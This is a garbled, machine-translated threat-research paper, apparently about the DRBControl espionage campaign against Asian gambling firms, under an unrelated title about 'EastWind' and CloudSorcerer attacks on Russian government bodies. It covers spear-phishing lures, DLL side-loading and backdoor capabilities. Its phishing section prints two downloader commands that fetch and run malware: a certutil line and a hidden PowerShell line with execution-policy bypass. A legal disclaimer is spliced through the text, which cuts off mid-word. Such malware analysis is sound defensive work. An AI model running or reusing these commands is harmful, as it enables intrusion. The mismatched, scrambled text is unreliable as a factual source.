EastWind 运动 ： 对俄罗斯政府组织的新 CloudSorcerer 攻击

在网络间谍活动中定位赌博操作 趋势微观法律免责声明此处提供的信息用于一般信息和教育目的。它不是有意和不应被解释为构成法律建议。The此处包含的信息可能不适用于所有情况，可能不会反映当前的情况。此处包含的任何内容都不应依赖或采取行动在没有基于fit的法律建议的基础上提出了特定的事实和情况，什么也没有此处应另作解释。趋势科技保留修改本文档内容的权利在任何时候，恕不另行通知。 Contents 4 最初的妥协：Spear网络钓鱼 7 将任何材料翻译成其他语言仅为了方便起见。翻译准确性不保证也不暗示。如果出现任何问题与翻译的准确性有关，请参阅文档的ficial版本的原始语言。任何翻译中产生的差异或差异是没有约束力，对合规性或执行目的。 恶意软件分析 18 其他使用的恶意软件家族 尽管趋势科技使用合理的努力来包括准确和最新的信息,趋势科技不作任何保证或陈述其准确性、货币或完整性。您同意访问、使用和依赖本文件其内容的风险由您自行承担。趋势科技放弃任何明示或暗示的保证。趋势科技或参与创建、制作或交付本文件应承担责任任何后果、损失或损害，包括直接、间接的、特殊的、后果性的、失去商业利益的fi，或特殊损害赔偿，使用，或无法使用，或与使用有关本文档或内容中的任何错误或遗漏Thereof. Use of this information constitutes acceptance for在“原样”条件下使用。 21 开发后工具 22 基础架构分析 24 与已知威胁参与者的链接 由发布 26Conclusion 趋势科技研究 Written by丹尼尔·伦希塞德里克·佩内特,Kenney Lu和Jamz Yaneza 根据许可使用的库存图像Shutterstock. com 2019年夏天，Talent - Jump Technologies，Inc.联系了趋势科技关于他们在执行事件响应后发现的后门位于菲律宾的公司的操作。趋势科技提供了进一步关于这个特殊后门的情报和背景。深入分析透露后门正被高级持续威胁使用我们称之为“DRBControl ”的(APT)演员，因为我们找不到任何相关的东西到我们的数据库或公共恶意软件存储库中的组。 我们的分析还发现，威胁行为者使用了一些额外的后门和后期开发工具，以及一些鱼叉式网络钓鱼可能在相关的初始阶段使用的文档竞选。其中一个后门是特别感兴趣的，因为它使用了fiLE托管服务Dropbox作为命令和控制(C & C)通道。我们共享我们对Dropbox的分析，自那以后一直与趋势科技合作关于问题。 我们观察到这场运动背后的威胁演员有非常特殊的fic目标，因为它只在东南部的赌博和博彩公司之后亚洲。我们已经意识到欧洲和中东地区也是有针对性的，但我们不能在Writing. The exfiltrated data was mostly composed of databases and source代码，这让我们相信这场运动是用于网络间谍或者获得竞争情报。一些后门对我们来说是未知的，这可能表明它是一个以前未报告的群体。然而，我们也设法将其与一些已知的威胁参与者联系起来。 这篇研究论文详细介绍了这一运动的不同阶段，包括最初的鱼叉式网络钓鱼电子邮件，对后门的详细分析，以及多种后开发工具。它还涵盖了对威胁的观察演员的活动和基础设施，包括与已知APT的连接groups. 最初的妥协：Spear网络钓鱼 在有针对性的攻击中，鱼叉式网络钓鱼是一种常见的感染媒介1由威胁行为者2寻找在目标的基础设施中获得初步立足点。获得目标的电子邮件地址相对容易，使用通用电子邮件地址或特定fic个人的电子邮件地址。我们在此公开的活动研究也不例外：威胁行为者使用鱼叉式网络钓鱼来欺骗接收者打开. DOCX文档。 我们目睹的鱼叉式网络钓鱼活动在2019年5月很活跃。我们可以找到两个不同的(在条款of language) - but very similar - kines of phishing content. The social engineering used in this campaign在实现威胁行为者的目标方面，这似乎是相当直截了当和有效的。 威胁演员的鱼叉式网络钓鱼攻击以组织的支持团队为目标。 出发地: 2931436431 @ {BLOCKED} q [.] com收件人：支持- <编辑> @ <编辑> 主题根据目标支持团队使用的语言而更改。支持-cn例如，团队收到了一封带有中文主题的电子邮件“注册不了的截图"" (无法注册截图“)，而support - jp团队收到了一封类似的电子邮件，以“错误屏幕截图”为主题。此外,文档被不同地显示。 支持团队习惯于接收来自客户的请求，以及包含屏幕截图的电子邮件from users may also be commonplace for these teams. However, support teams should be ward of how不寻常的是，用户可能会发送包含屏幕截图的. DOCXfile，这需要额外的用户操作（双击，在这种情况下）仅显示图像。 We were able tofind at least three different versions of the infecting documents. Thefirst version, when用户双击，嵌入一个可执行文件file，该文件已启动并充当恶意软件（被趋势科技检测为Trojan. Win32. CLAMBLING. A）。 该文档的第二个版本嵌入了一个. BATfile，它也充当相同版本的下载器恶意软件。 cd% temp% & & certutil - urlcache - split - f http: / / {BLOCKED}. {BLOCKED}. 18.154 / debug. exe& debug. exe 在感染文档中找到的命令行内容，下载并执行第二阶段恶意软件 该文档的第三个版本使用PowerShell下载恶意软件。 cmd / c start powershell. exe - ep Bypass - NoP - NonI - W Hidden (new - object System. Net.WebClient). DownloadFile ('http: / / {BLOCKED}. {BLOCKED}. 18.154 / test. cab', '% TEMP%\\ test。cab ');展开'% temp%\\ test. cab '% temp% - f: *;开始处理'% TEMP%\\ config. exe ' 我们的分析表明，前两个版本执行相同的file (检测为Trojan. Win32。 （顶部：“注册信息错误图片”底部: “双击放大图片”) 我们还发现了2017年7月的武器化文档，使用类似的PowerShell代码来删除后门（在本研究中稍后分析为2型），但我们无法在遥测中搜索它。同样，它也欺骗用户双击图像，从而触发代码执行。 恶意软件分析 此活动使用了我们以前不知道的两个主要后门。我们还发现了一些 已知的恶意软件家族，如PlugX和HyperBro，以及许多自定义的后期开发工具。 下面我们描述两个后门的加载、持久性和功能。 1型后门 加载有效载荷 这个后门是用C++语言编写的，类继承自虚拟类。后门也是模块化的，允许使用插件进行扩展。 当前方法：DLL侧面加载 要加载此后门，威胁行为者会启动合法的fiLEMsMpEng. exe,由Microsoft并描述为“反恶意软件服务可执行文件”。此可执行文件容易受到DLL的攻击侧面装载,3其中在程序上加载了非预期的DLL。在这种情况下，恶意行为者通过存储名为的file来利用它mpsvc. dll在同一目录中。然后该DLL打开第三个filename，mpsvc. mui，其中包含混淆的后门，对其进行解码，并将其加载到svchost. exe过程。 我们在野外发现了两个RAR存档文件（检测为Trojan. Win64. CLAMBLING. A），其中包含上述files。嵌入式files的modifi阳离子时间为2019 - 07 - 25。 旧方法：修补合法文件 有趣的是，我们观察到在这个后门的旧版本中使用了一种不同的技术。威胁actor手动修补了中国存档软件“HaoZip ”的合法安装程序的一些字节，（通常在中国用作WinRAR和WinZip的替代方法）将代码ow重定向到函数附加在二进制文件的末尾。 添加的函数通过将它们与哈希进行比较来解析指向多个WinAPI函数的一些指针通过简单的自定义算法生成。然后，代码将二进制覆盖加载到内存中，该二进制覆盖contains a routine to decompress and load thefinal payload. The routine also check if the process is通过将PEB的第三位与0进行比较来调试。 后门功能 The drop payload is a backdoor written in C ++. It embeds a consefigamefile in clear text that containsC & C、要复制file的路径以及要创建的服务名称。 如果未提供任何参数，则将file复制到fi配置中指定的fi路径，其属性为设置为系统和隐藏，并向“运行”注册表项添加一个值，以在下一个boot. 它处理以下参数： •••P：创建一个挂起的svchost. exe进程，注入代码，然后恢复O：初始化插件和后门功能U：使用passuac. dllfile绕过用户帐户控制(UAC) 运行时类型信息(RTTI)存在于可执行文件中，使我们能够获得真正的类名称: •••CHPPlugin：每个“插件”类实现的虚拟类CHPCmd：通过终端执行类处理命令CHPExplorer：提供浏览目录、枚举网络共享、读取、写入、并执行files•••CHPAvi: Class providing recording of the screen content in AVI format and AVIfiles enumerationCHPKeyLog：提供键盘记录功能的类（稍后讨论）CHPPipe：提供处理命名管道的函数的类 ••••••••••CHPProcess：提供枚举和终止进程的函数的类CHPProxy:类添加代理支持CHPRegedit：提供处理注册表项的函数（枚举，复制，设置，删除）的类CHPScreen：类处理屏幕截图捕获功能CHPService：类提供处理服务的函数（创建、删除、修改、查询、启动）CHPNet：每个“通信协议”类实现的虚拟类CHPHttp：与HTTP协议处理相关的网络类CHPTcp：与TCP协议处理相关的网络类CHPUdp：与UDP协议处理相关的网络类CHPTelnet：与Telnet协议处理相关的网络类 恶意软件还会将受感染系统的信息（如下所示）发送到C & C服务器： ••••••主机名（如果未找到主机名，则为IP地址）计算机名称当前权限（系统/管理员/用户）Windows版本当前时间固定字符串(可能是活动标识fiER) 在发送信息之前，通过将每个字符与其在fiX替代表。 Dropbox在其感染链中的使用 此后门的最新版本中出现了一个重要功能：添加新C＆C的新线程使用Dropbox API的通道。该线程在执行任何操作之前等待30分钟，然后收集以下有关主机的信息： ••••••本地IP地址计算机名称用户名操作系统(OS)版本恶意软件版本（fix字符串；我们看到的值范围从1.0到9.0）注册表项的内容：HKEY _ CURRENT _ USER\ Software\ Bitcoin\ Bi